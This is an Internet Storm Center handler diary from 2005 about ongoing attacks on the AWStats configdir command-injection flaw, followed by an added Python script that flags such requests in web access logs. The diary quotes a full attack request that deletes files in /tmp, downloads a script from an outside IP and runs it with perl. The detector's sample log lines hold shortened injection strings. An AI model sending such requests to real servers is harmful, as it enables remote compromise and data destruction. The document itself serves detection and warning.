SANS ISC: AWSTATS SANS ISC InfoSec Forums

AWSTATS
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  It's all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place, so keep your eyes open.

GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.



Lorna

165 Posts
ISC Handler
Sep 27th 2005
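
A log check for the request pattern shown in the diary above, as an added example that is not part of the original post: it scans web server access-log lines for awstats.pl requests whose decoded configdir value is anything other than a plain path, and reports the response status for triage. The sample log lines, the function names and the rule that a legitimate configdir contains only path characters are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format: client ... "METHOD target HTTP/x.y" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Assumption: a legitimate configdir is a plain filesystem path.
SAFE_PATH = re.compile(r'[A-Za-z0-9_./-]*')

# Constructed sample lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2005:10:01:02 +0000] '
    '"GET //awstats.pl?configdir=|echo%20;cd%20/tmp;echo| HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Sep/2005:10:02:00 +0000] '
    '"GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 20480',
    '192.0.2.12 - - [27/Sep/2005:10:03:00 +0000] '
    '"GET /cgi-bin/awstats.pl?configdir=%7Cecho%7C HTTP/1.1" 404 300',
    '192.0.2.13 - - [27/Sep/2005:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

def suspicious_configdir(line):
    """Return a finding dict for an awstats.pl request with a non-path configdir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split by hand: a leading '//' (as in the reported request) confuses URL parsers.
    path, _, query = m.group('target').partition('?')
    if not unquote_plus(path).lower().endswith('awstats.pl'):
        return None
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if unquote_plus(name).lower() != 'configdir':
            continue
        decoded = unquote_plus(value)  # compare the decoded value, not the raw bytes
        if not SAFE_PATH.fullmatch(decoded):
            return {'client': m.group('client'),
                    'status': int(m.group('status')),
                    'configdir': decoded}
    return None

def scan(lines):
    """Collect findings for every line that matches the pattern."""
    return [hit for hit in map(suspicious_configdir, lines) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status only shows that the script answered; whether the injected command ran has to be confirmed on the host itself.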
